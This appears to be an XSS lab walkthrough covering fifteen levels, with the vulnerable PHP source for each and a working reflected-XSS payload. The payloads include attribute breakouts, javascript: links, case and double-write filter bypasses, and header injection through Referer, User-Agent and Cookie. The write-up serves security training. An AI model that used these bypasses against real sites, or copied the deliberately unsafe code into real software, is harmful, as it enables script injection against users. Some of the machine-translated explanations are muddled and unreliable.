XSS Source download

xssgame

The local structures,

 level1

  View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center> Welcome to :".$str."</h2>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/8deed969-b339-4c84-8654-b1a1e40e06de.png" width="50%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

name Variables pass through GET Mode in , There's no filtering . 

payload as follows

/level1.php?name=<script>alert(1)</script>

level2

  View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value=" Search for "/>
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/688da926-8a0b-452a-9a2b-82ba919328fb.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

PHP htmlspecialchars() function

Variables pass through GET Mode in . The label passed htmlspecialchars() code , but input The tag does not have any filtering , So try to input Close double quotation marks in the label ", To trigger an event .

onclick：javascript event

onclick The event will occur when the object is clicked .

" onclick=alert('H3018') //

  Click the input box after input

 level3

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value= Search for  />
</form>
</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/ee7a688a-d75e-4ed7-8a79-96e62d3127e2.png" width="15%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

Variables pass through GET Mode in . The label passed htmlspecialchars() code , but input The tag does not have any filtering , So try to input Close double quotation marks in the label ', To trigger an event .

' onclick=alert('H3018') //

 level4

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/0d3f0d24-a861-4d20-97da-f807ea842be8.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str3)."</h3>";
?>

In the level2 On the basis of , Filtered angle brackets , But in input Close double quotation marks in the tag to construct events to trigger without angle brackets , therefore payload Still apply

" onclick=alert('H3018') //

 level5

  View the source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/cb30e912-eabc-4357-89eb-49e8de1b1961.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str3)."</h3>";
?>

Here, first convert the characters of the incoming variables into lowercase , Then filter <script And converted to <scr_ipt, take on Turn into o_n, We can't trigger events through these two methods , But you can close double quotes and labels , And then through javascript:alert('H3018') To trigger the pop-up window . This is actually a javascript: The following code is JavaScript To execute , And return the result value to the current page .

"><a href=javascript:alert('H3018') //

Click here

 level6

  View the source code

<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str6)."</h3>";
?>

Than level5 Many filtering principles have been added , But the incoming string is not converted to lowercase , Here you can bypass by case

payload:

" Onclick=alert('H3018') //

"><a Href=javascript:alert('H3018') //

 level7

  View source code

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str6)."</h3>";
?>

Here we use strtolower() Uniformly convert strings to lowercase , but str_replace() The function converts the matched string into spaces , We can use double write to bypass

" oonnclick=alert('H3018') //

 level8

  View source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value= Add links  />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'"> link </a></center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str7)."</h3>";
?>

Here, the incoming string is strictly detected and filtered , But in <cente> The tag does not htmlspecialchars() Function processing , You can try to use javascript This form triggers XSS

Use HTML Entity character encoding bypasses filtering

javascript:alert('H3018') //

  Click the link

 level9

  There are links , It is estimated that it is similar to the above question

View the source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value= Add links  />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href=" Your link is illegal ？ Is there any ！"> link </a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'"> link </a></center>';
}
?>

Added detection of incoming strings , Directly in payload Add later ：http://

javascript:alert('H3018') //http://

Click on the link

 level10

  View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Two output points $str No drama , After htmlspecialchars($str) Function processing , see $str33 The output point of , It's hidden here , Manually modify type value

keyword=&t_sort=" type="" onclick=alert('H3018') //

 level11

  Don't get the frame

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Here to $str And $str00 Both input strings are processed , Basically, there is no play , But it's not right $str11 To deal with , We make use of bp To modify the referer To trigger the pop-up window

Referer: " type="" onclick=alert('H3018') //

 level12

  View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

The same idea as the previous level , nothing but USER-AGENT Inject

utilize bp modify USER_AGENT

User-Agent: " type="" onclick=alert('H3018') //

 level13

  It's so cool to do questions, hahaha

View source code

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

COOKIE Inject

utilize BP

Cookie: user=" type="" onclick=alert('H3018') //

 level14

  View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

ng-include Instructions are used to contain external HTML file .

The content contained will be the child node of the specified element .

ng-include The value of a property can be an expression , Returns a file name .

By default , The included files need to be included in the same domain name .

  Here you can use the page that contains other related pages to trigger pop-up

?src="level1.php?name=<img src=x onerror=alert('H3018')>"

Here is the... In the source code https://chao.jsanhuan.cn/angular.min.js This external script file is no longer accessible

I didn't take it locally , So this payload Maybe I can't get through locally

level15

  View source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/9ec67d16-a8b9-41cd-82fa-14b0c0f96e72.gif"</center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str5)."</h3>";
?>

It's filtered here script The tabs filter out spaces , It can be used %0a To replace

level15.php?keyword=<img%0asrc=x%0aonerror=alert('H3018')>